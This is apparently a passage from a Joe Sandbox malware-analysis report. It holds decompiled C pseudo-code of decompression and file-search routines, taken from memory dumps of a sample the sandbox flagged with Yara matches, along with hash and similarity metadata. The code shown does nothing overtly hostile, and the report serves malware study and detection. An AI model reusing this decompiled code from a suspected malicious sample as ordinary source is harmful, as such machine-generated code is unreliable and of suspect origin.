                                                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                          										_t208 =  *_t284;
                                                                          										_v36 =  &(_t284[1]);
                                                                          									}
                                                                          									_a6 = _t208;
                                                                          								} else {
                                                                          									_a4 = 0xc0;
                                                                          								}
                                                                          								_t286 = 1 << _v8 - _t186;
                                                                          								_t244 = _v12 >> _t186;
                                                                          								while(_t244 < _v40) {
                                                                          									 *(_t168 + _t244 * 4) = _a4;
                                                                          									_t244 = _t244 + _t286;
                                                                          								}
                                                                          								_t287 = _v12;
                                                                          								_t246 = 1 << _v44;
                                                                          								while((_t287 & _t246) != 0) {
                                                                          									_t287 = _t287 ^ _t246;
                                                                          									_t246 = _t246 >> 1;
                                                                          								}
                                                                          								_t288 = _t287 ^ _t246;
                                                                          								_v20 = 1;
                                                                          								_v12 = _t288;
                                                                          								_t251 = _v16;
                                                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                          									L60:
                                                                          									if(_v48 != 0) {
                                                                          										_t282 = _v48;
                                                                          										_t65 =  &_a28; // 0x432170
                                                                          										_t283 = _t282 - 1;
                                                                          										_t200 =  *_t65 + _t186;
                                                                          										_v48 = _t283;
                                                                          										_v24 = _t200;
                                                                          										if(_v8 <= _t200) {
                                                                          											goto L45;
                                                                          										}
                                                                          										goto L31;
                                                                          									}
                                                                          									break;
                                                                          								} else {
                                                                          									goto L58;
                                                                          								}
                                                                          								do {
                                                                          									L58:
                                                                          									_t186 = _t186 - _a28;
                                                                          									_t251 = _t251 - 1;
                                                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                          								_v16 = _t251;
                                                                          								goto L60;
                                                                          							}
                                                                          							L61:
                                                                          							_v8 = _v8 + 1;
                                                                          							_v32 = _v32 + 4;
                                                                          							_v44 = _v44 + 1;
                                                                          						} while (_v8 <= _v28);
                                                                          						goto L62;
                                                                          					}
                                                                          					_t277 = 0;
                                                                          					do {
                                                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                          						_t277 = _t277 + 4;
                                                                          						_t235 = _t235 - 1;
                                                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                          					} while (_t235 != 0);
                                                                          					goto L21;
                                                                          				}
                                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                                          				 *_a28 =  *_a28 & 0x00000000;
                                                                          				return 0;
                                                                          			}











































































                                                                          0x00407346
                                                                          0x00407347
                                                                          0x00407347
                                                                          0x0040734f
                                                                          0x00407352
                                                                          0x00407356
                                                                          0x00407358
                                                                          0x0040735a
                                                                          0x0040735d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00407365
                                                                          0x0040736b
                                                                          0x0040736d
                                                                          0x0040736f
                                                                          0x00407370
                                                                          0x00407385
                                                                          0x00407385
                                                                          0x00407388
                                                                          0x0040738a
                                                                          0x0040738a
                                                                          0x0040738c
                                                                          0x00407391
                                                                          0x00407393
                                                                          0x0040739a
                                                                          0x0040739c
                                                                          0x004073a4
                                                                          0x004073a4
                                                                          0x004073a6
                                                                          0x004073a7
                                                                          0x004073b6
                                                                          0x004073ba
                                                                          0x004073be
                                                                          0x004073c1
                                                                          0x004073c4
                                                                          0x004073c9
                                                                          0x004073cc
                                                                          0x004073d2
                                                                          0x004073d9
                                                                          0x004073df
                                                                          0x004075d8
                                                                          0x004075d8
                                                                          0x004075dd
                                                                          0x004075ec
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004075dd
                                                                          0x004073ec
                                                                          0x004073ef
                                                                          0x004073f2
                                                                          0x004073f5
                                                                          0x004073f9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00407404
                                                                          0x00407404
                                                                          0x00407407
                                                                          0x00407408
                                                                          0x0040740a
                                                                          0x00407410
                                                                          0x00407413
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00407419
                                                                          0x0040741a
                                                                          0x0040741d
                                                                          0x00407420
                                                                          0x00407423
                                                                          0x00407426
                                                                          0x00407429
                                                                          0x0040742b
                                                                          0x0040742b
                                                                          0x0040742b
                                                                          0x00407433
                                                                          0x00407437
                                                                          0x0040743c
                                                                          0x00407461
                                                                          0x00407467
                                                                          0x00407469
                                                                          0x0040746b
                                                                          0x0040746e
                                                                          0x00407477
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040743e
                                                                          0x0040743e
                                                                          0x00407447
                                                                          0x0040744b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040745c
                                                                          0x0040745c
                                                                          0x0040745f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040744f
                                                                          0x00407452
                                                                          0x00407454
                                                                          0x00407458
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040745a
                                                                          0x0040745a
                                                                          0x00000000
                                                                          0x0040745c
                                                                          0x00407480
                                                                          0x00407486
                                                                          0x00407490
                                                                          0x00407492
                                                                          0x00407497
                                                                          0x00407499
                                                                          0x004074cf
                                                                          0x0040749b
                                                                          0x0040749b
                                                                          0x0040749e
                                                                          0x004074a1
                                                                          0x004074a8
                                                                          0x004074ab
                                                                          0x004074ae
                                                                          0x004074b5
                                                                          0x004074c0
                                                                          0x004074c7
                                                                          0x004074c7
                                                                          0x004074d1
                                                                          0x004074d4
                                                                          0x004074d6
                                                                          0x004074d6
                                                                          0x004074dc
                                                                          0x004074dc
                                                                          0x004074e5
                                                                          0x004074e8
                                                                          0x004074e8
                                                                          0x004074ed
                                                                          0x004074fc
                                                                          0x00407504
                                                                          0x00407509
                                                                          0x0040752d
                                                                          0x00407535
                                                                          0x00407539
                                                                          0x0040753f
                                                                          0x0040750b
                                                                          0x00407519
                                                                          0x0040751c
                                                                          0x00407522
                                                                          0x00407522
                                                                          0x00407543
                                                                          0x004074fe
                                                                          0x004074fe
                                                                          0x004074fe
                                                                          0x00407554
                                                                          0x00407558
                                                                          0x00407564
                                                                          0x0040755f
                                                                          0x00407562
                                                                          0x00407562
                                                                          0x0040756c
                                                                          0x00407571
                                                                          0x00407579
                                                                          0x00407575
                                                                          0x00407577
                                                                          0x00407577
                                                                          0x0040757f
                                                                          0x00407581
                                                                          0x00407588
                                                                          0x00407592
                                                                          0x0040759c
                                                                          0x004075b8
                                                                          0x004075bc
                                                                          0x00407401
                                                                          0x00407404
                                                                          0x00407407
                                                                          0x00407408
                                                                          0x0040740a
                                                                          0x00407410
                                                                          0x00407413
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00407413
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040759e
                                                                          0x0040759e
                                                                          0x0040759e
                                                                          0x004075a3
                                                                          0x004075ac
                                                                          0x004075b5
                                                                          0x00000000
                                                                          0x004075b5
                                                                          0x004075c2
                                                                          0x004075c2
                                                                          0x004075c5
                                                                          0x004075cc
                                                                          0x004075cf
                                                                          0x00000000
                                                                          0x004073f2
                                                                          0x00407372
                                                                          0x00407374
                                                                          0x00407374
                                                                          0x00407378
                                                                          0x0040737b
                                                                          0x0040737c
                                                                          0x0040737c
                                                                          0x00000000
                                                                          0x00407374
                                                                          0x004072e8
                                                                          0x004072ee
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p!C$p!C
                                                                          • API String ID: 0-3125587631
                                                                          • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                          • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                                          • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                          • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$[N
                                                                          • API String ID: 0-4019389694
                                                                          • Opcode ID: 344bce10a42f3f2c2b7532a0b46eff19d7ec8b417b9bcc6d9323088731af9fad
                                                                          • Instruction ID: 411b83f1df53b3535a46b6bcd127cc1703302e08da154e6f120c9ff0cb8ecfe9
                                                                          • Opcode Fuzzy Hash: 344bce10a42f3f2c2b7532a0b46eff19d7ec8b417b9bcc6d9323088731af9fad
                                                                          • Instruction Fuzzy Hash: 9A517821A4568DDEEF305D34492E3F627E79F63260F49869BCC494B14AD73C898BCB11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$[N
                                                                          • API String ID: 0-4019389694
                                                                          • Opcode ID: 455159a7a88857426cfd3e1002192948cf12765e5abf78dca0f19f2987f3f33e
                                                                          • Instruction ID: 625ab792f7b4c322078d22c69c516bdfd62d1e09a199402a20a26feeea06d1b8
                                                                          • Opcode Fuzzy Hash: 455159a7a88857426cfd3e1002192948cf12765e5abf78dca0f19f2987f3f33e
                                                                          • Instruction Fuzzy Hash: 8E415E35A40349DFDF349D7489793EA23A79F55360F95426FCC4A8B189D738458ACB02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N42
                                                                          • API String ID: 0-160677327
                                                                          • Opcode ID: 91a2f7780ef15b7d7c4833e3806bcdb9013c547b192a1d28d32d591d425ce318
                                                                          • Instruction ID: 9c6fdae5e62713cab58f5fe062c9b944d26298bec59bfbd0fee85475a46a5401
                                                                          • Opcode Fuzzy Hash: 91a2f7780ef15b7d7c4833e3806bcdb9013c547b192a1d28d32d591d425ce318
                                                                          • Instruction Fuzzy Hash: 1FB1CB7A6013098FEB259E3888997F67BE3EF63250F65429ECD848F646D3258C07C742
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 39%
                                                                          			E00402862(short __ebx, short* __esi) {
                                                                          				void* _t21;
                                                                          
                                                                          				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
                                                                          					E004061C9( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                          					_push(_t21 - 0x2a8);
                                                                          					_push(__esi);
                                                                          					E00406282();
                                                                          				} else {
                                                                          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                          					 *__esi = __ebx;
                                                                          					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                          				return 0;
                                                                          			}





                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
                                                                          • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                          • Opcode Fuzzy Hash: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
                                                                          • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ?J,M
                                                                          • API String ID: 0-3311233406
                                                                          • Opcode ID: 887c7ebfc6956b7042aaf4b9213793b45bb04cdfbd1a49f89d328aaa50656a91
                                                                          • Instruction ID: d5df2249f39ecec896d357bef3b7b4f227905dfa215c7f95dcce700036696b9c
                                                                          • Opcode Fuzzy Hash: 887c7ebfc6956b7042aaf4b9213793b45bb04cdfbd1a49f89d328aaa50656a91
                                                                          • Instruction Fuzzy Hash: 0C711272501348CFDB2A5E74C96A3DB3732EF62398F66459DCC8A9B520D336458ACF02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Q:b
                                                                          • API String ID: 0-793305620
                                                                          • Opcode ID: a0f403db7b7188cedc1a17910686ce8f0cf2fde9a8d04205233bb4c77d9ac9f2
                                                                          • Instruction ID: 517bee59635f898bddf5d0580c72498fe1eef99aa6e4d6ce63c821ecb000e0cc
                                                                          • Opcode Fuzzy Hash: a0f403db7b7188cedc1a17910686ce8f0cf2fde9a8d04205233bb4c77d9ac9f2
                                                                          • Instruction Fuzzy Hash: 0841C5765813228FDF7A6E3C99D63C33AF2EF63690B8441A68C868B55CD3354186CB07
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8e1794e96049ad3a67dc489baa8988ae6333d6aa3c684fe0bbcb78866d1bec0
                                                                          • Instruction ID: 3a6e7eb7c931a7e4aceccf1360cd40784e7ced6ff6245db287a7966429bdd3f8
                                                                          • Opcode Fuzzy Hash: a8e1794e96049ad3a67dc489baa8988ae6333d6aa3c684fe0bbcb78866d1bec0
                                                                          • Instruction Fuzzy Hash: 5281BBCAD2D305CBEB82306740AF3F62212BFE5651F558EF998EB521A162DF444DC9C4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E00406ADD(signed int __ebx, signed int* __esi) {
                                                                          				signed int _t396;
                                                                          				signed int _t425;
                                                                          				signed int _t442;
                                                                          				signed int _t443;
                                                                          				signed int* _t446;
                                                                          				void* _t448;
                                                                          
                                                                          				L0:
                                                                          				while(1) {
                                                                          					L0:
                                                                          					_t446 = __esi;
                                                                          					_t425 = __ebx;
                                                                          					if( *(_t448 - 0x34) == 0) {
                                                                          						break;
                                                                          					}
                                                                          					L55:
                                                                          					__eax =  *(__ebp - 0x38);
                                                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          					__ecx = __ebx;
                                                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          					__ebx = __ebx + 8;
                                                                          					while(1) {
                                                                          						L56:
                                                                          						if(__ebx < 0xe) {
                                                                          							goto L0;
                                                                          						}
                                                                          						L57:
                                                                          						__eax =  *(__ebp - 0x40);
                                                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                          						__ecx = __eax;
                                                                          						__esi[1] = __eax;
                                                                          						__ecx = __eax & 0x0000001f;
                                                                          						if(__cl > 0x1d) {
                                                                          							L9:
                                                                          							_t443 = _t442 | 0xffffffff;
                                                                          							 *_t446 = 0x11;
                                                                          							L10:
                                                                          							_t446[0x147] =  *(_t448 - 0x40);
                                                                          							_t446[0x146] = _t425;
                                                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                          							L11:
                                                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                          							E0040724C( *(_t448 + 8));
                                                                          							return _t443;
                                                                          						}
                                                                          						L58:
                                                                          						__eax = __eax & 0x000003e0;
                                                                          						if(__eax > 0x3a0) {
                                                                          							goto L9;
                                                                          						}
                                                                          						L59:
                                                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                          						__ebx = __ebx - 0xe;
                                                                          						_t94 =  &(__esi[2]);
                                                                          						 *_t94 = __esi[2] & 0x00000000;
                                                                          						 *__esi = 0xc;
                                                                          						while(1) {
                                                                          							L60:
                                                                          							__esi[1] = __esi[1] >> 0xa;
                                                                          							__eax = (__esi[1] >> 0xa) + 4;
                                                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                          								goto L68;
                                                                          							}
                                                                          							L61:
                                                                          							while(1) {
                                                                          								L64:
                                                                          								if(__ebx >= 3) {
                                                                          									break;
                                                                          								}
                                                                          								L62:
                                                                          								if( *(__ebp - 0x34) == 0) {
                                                                          									goto L182;
                                                                          								}
                                                                          								L63:
                                                                          								__eax =  *(__ebp - 0x38);
                                                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          								__ecx = __ebx;
                                                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          								__ebx = __ebx + 8;
                                                                          							}
                                                                          							L65:
                                                                          							__ecx = __esi[2];
                                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                          							__ebx = __ebx - 3;
                                                                          							_t108 = __ecx + 0x4084cc; // 0x121110
                                                                          							__ecx =  *_t108;
                                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                          							__ecx = __esi[1];
                                                                          							__esi[2] = __esi[2] + 1;
                                                                          							__eax = __esi[2];
                                                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                          								goto L64;
                                                                          							}
                                                                          							L66:
                                                                          							while(1) {
                                                                          								L68:
                                                                          								if(__esi[2] >= 0x13) {
                                                                          									break;
                                                                          								}
                                                                          								L67:
                                                                          								_t119 = __esi[2] + 0x4084cc; // 0x4000300
                                                                          								__eax =  *_t119;
                                                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                          								_t126 =  &(__esi[2]);
                                                                          								 *_t126 = __esi[2] + 1;
                                                                          							}
                                                                          							L69:
                                                                          							__ecx = __ebp - 8;
                                                                          							__edi =  &(__esi[0x143]);
                                                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                          							__eax = 0;
                                                                          							 *(__ebp - 8) = 0;
                                                                          							__eax =  &(__esi[3]);
                                                                          							 *__edi = 7;
                                                                          							__eax = E004072B4( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                          							if(__eax != 0) {
                                                                          								L72:
                                                                          								 *__esi = 0x11;
                                                                          								while(1) {
                                                                          									L180:
                                                                          									_t396 =  *_t446;
                                                                          									if(_t396 > 0xf) {
                                                                          										break;
                                                                          									}
                                                                          									L1:
                                                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M0040720C))) {
                                                                          										case 0:
                                                                          											L101:
                                                                          											__eax = __esi[4] & 0x000000ff;
                                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                                          											__eax = __esi[5];
                                                                          											__esi[2] = __esi[5];
                                                                          											 *__esi = 1;
                                                                          											goto L102;
                                                                          										case 1:
                                                                          											L102:
                                                                          											__eax = __esi[3];
                                                                          											while(1) {
                                                                          												L105:
                                                                          												__eflags = __ebx - __eax;
                                                                          												if(__ebx >= __eax) {
                                                                          													break;
                                                                          												}
                                                                          												L103:
                                                                          												__eflags =  *(__ebp - 0x34);
                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                          													goto L182;
                                                                          												}
                                                                          												L104:
                                                                          												__ecx =  *(__ebp - 0x38);
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                          												__ecx = __ebx;
                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          												__ebx = __ebx + 8;
                                                                          												__eflags = __ebx;
                                                                          											}
                                                                          											L106:
                                                                          											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
                                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                                          											__ecx = __esi[2];
                                                                          											__eax = __esi[2] + __eax * 4;
                                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                          											__ecx =  *__eax & 0x000000ff;
                                                                          											__eflags = __ecx;
                                                                          											if(__ecx != 0) {
                                                                          												L108:
                                                                          												__eflags = __cl & 0x00000010;
                                                                          												if((__cl & 0x00000010) == 0) {
                                                                          													L110:
                                                                          													__eflags = __cl & 0x00000040;
                                                                          													if((__cl & 0x00000040) == 0) {
                                                                          														goto L125;
                                                                          													}
                                                                          													L111:
                                                                          													__eflags = __cl & 0x00000020;
                                                                          													if((__cl & 0x00000020) == 0) {
                                                                          														goto L9;
                                                                          													}
                                                                          													L112:
                                                                          													 *__esi = 7;
                                                                          													goto L180;
                                                                          												}
                                                                          												L109:
                                                                          												__esi[2] = __ecx;
                                                                          												__esi[1] = __eax;
                                                                          												 *__esi = 2;
                                                                          												goto L180;
                                                                          											}
                                                                          											L107:
                                                                          											__esi[2] = __eax;
                                                                          											 *__esi = 6;
                                                                          											goto L180;
                                                                          										case 2:
                                                                          											L113:
                                                                          											__eax = __esi[2];
                                                                          											while(1) {
                                                                          												L116:
                                                                          												__eflags = __ebx - __eax;
                                                                          												if(__ebx >= __eax) {
                                                                          													break;
                                                                          												}
                                                                          												L114:
                                                                          												__eflags =  *(__ebp - 0x34);
                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                          													goto L182;
                                                                          												}
                                                                          												L115:
                                                                          												__ecx =  *(__ebp - 0x38);
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                          												__ecx = __ebx;
                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          												__ebx = __ebx + 8;
                                                                          												__eflags = __ebx;
                                                                          											}
                                                                          											L117:
                                                                          											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                          											__esi[1] = __esi[1] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                          											__ecx = __eax;
                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          											__ebx = __ebx - __eax;
                                                                          											__eflags = __ebx;
                                                                          											__eax = __esi[4] & 0x000000ff;
                                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                                          											__eax = __esi[6];
                                                                          											__esi[2] = __esi[6];
                                                                          											 *__esi = 3;
                                                                          											goto L118;
                                                                          										case 3:
                                                                          											L118:
                                                                          											__eax = __esi[3];
                                                                          											while(1) {
                                                                          												L121:
                                                                          												__eflags = __ebx - __eax;
                                                                          												if(__ebx >= __eax) {
                                                                          													break;
                                                                          												}
                                                                          												L119:
                                                                          												__eflags =  *(__ebp - 0x34);
                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                          													goto L182;
                                                                          												}
                                                                          												L120:
                                                                          												__ecx =  *(__ebp - 0x38);
                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                          												__ecx = __ebx;
                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                          												__ebx = __ebx + 8;
                                                                          												__eflags = __ebx;
                                                                          											}
                                                                          											L122:
                                                                          											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
                                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                                          											__ecx = __esi[2];
                                                                          											__eax = __esi[2] + __eax * 4;
                                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                          											__ecx =  *__eax & 0x000000ff;
                                                                          											__eflags = __cl & 0x00000010;
                                                                          											if((__cl & 0x00000010) == 0) {
                                                                          												L124:
                                                                          												__eflags = __cl & 0x00000040;
                                                                          												if((__cl & 0x00000040) != 0) {
                                                                          													goto L9;
                                                                          												}
                                                                          												L125:
                                                                          												__esi[3] = __ecx;
                                                                          												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                          												__esi[2] = __eax;
                                                                          												goto L180;
                                                                          											}
                                                                          											L123:
                                                                          											__esi[2] = __ecx;
                                                                          											__esi[3] = __eax;
                                                                          											 *__esi = 4;
                                                                          											goto L180;
                                                                          										case 4:
                                                                          											L126:
                                                                          											__eax = __esi[2];
                                                                          											while(1) {
                                                                          												L129:
                                                                          												__eflags = __ebx - __eax;
                                                                          												if(__ebx >= __eax) {
                                                                          													break;
                                                                          												}
                                                                          												L127:
                                                                          												__eflags =  *(__ebp - 0x34);
                                                                          												if( *(__ebp - 0x34) == 0) {
